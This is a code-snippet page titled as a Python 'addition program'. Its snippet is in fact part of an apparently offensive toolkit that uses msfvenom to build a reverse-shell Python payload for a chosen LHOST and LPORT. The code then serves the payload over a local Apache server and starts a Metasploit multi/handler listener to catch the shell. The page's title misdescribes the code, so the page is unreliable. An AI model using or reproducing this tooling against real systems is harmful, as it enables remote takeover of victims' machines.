How to use 'addition program in python' in Python

Every line of 'addition program in python' code snippets is scanned for vulnerabilities by our powerful machine learning engine that combs millions of open source libraries, ensuring your Python code is secure.

All examples are scanned by Snyk Code

By copying the Snyk Code Snippets you agree to
293def python():
294 lhost = raw_input("Enter LHOST: ")
295 lport = raw_input("Enter LPORT: ")
296 name = raw_input("Enter Payload Name: ")
297 os.system("msfvenom -p cmd/unix/reverse_python LHOST=%s LPORT=%s -f raw > /sdcard/EasY_HaCk/%s.py"%(lhost,lport,name))
298 clear()
299 print "Payload Successfuly Generated"
300 print "[1]-Do You Want To Start a listenner"
301 print "[2]-Do You Want To Start an IP Poisener "
302 li = raw_input()
303 if li == '2' :
304 os.system('rm $PREFIX/var/run/apache2/httpd.pid')
305 os.system('apachectl start')
306 os.system('cp /sdcard/EasY_HaCk/%s.py $PREFIX/share/apache2/default-site/htdocs/zaki/'%(name))
307 os.system('clear')
308 print "Your IP Successfully Poisened :\033[0m http://%s:8080/zaki/%s.py"%(lhost,name)
309 listen = """
310 use exploit/multi/handler
311 set PAYLOAD cmd/unix/reverse_python
312 set LHOST {0}
313 set LPORT {1}
314 exploit
315 """.format(lhost,lport)
316 with open('listener.rc', 'w') as f :
317 f.write(listen)
318 os.system('msfconsole -r listener.rc')
319
320 else :
321 listen = """
322 use exploit/multi/handler
323 set PAYLOAD cmd/unix/reverse_python
324 set LHOST {0}
325 set LPORT {1}
326 exploit
327 """.format(lhost,lport)
328 with open('listener.rc', 'w') as f :
329 f.write(listen)
330 os.system('msfconsole -r listener.rc')

Related snippets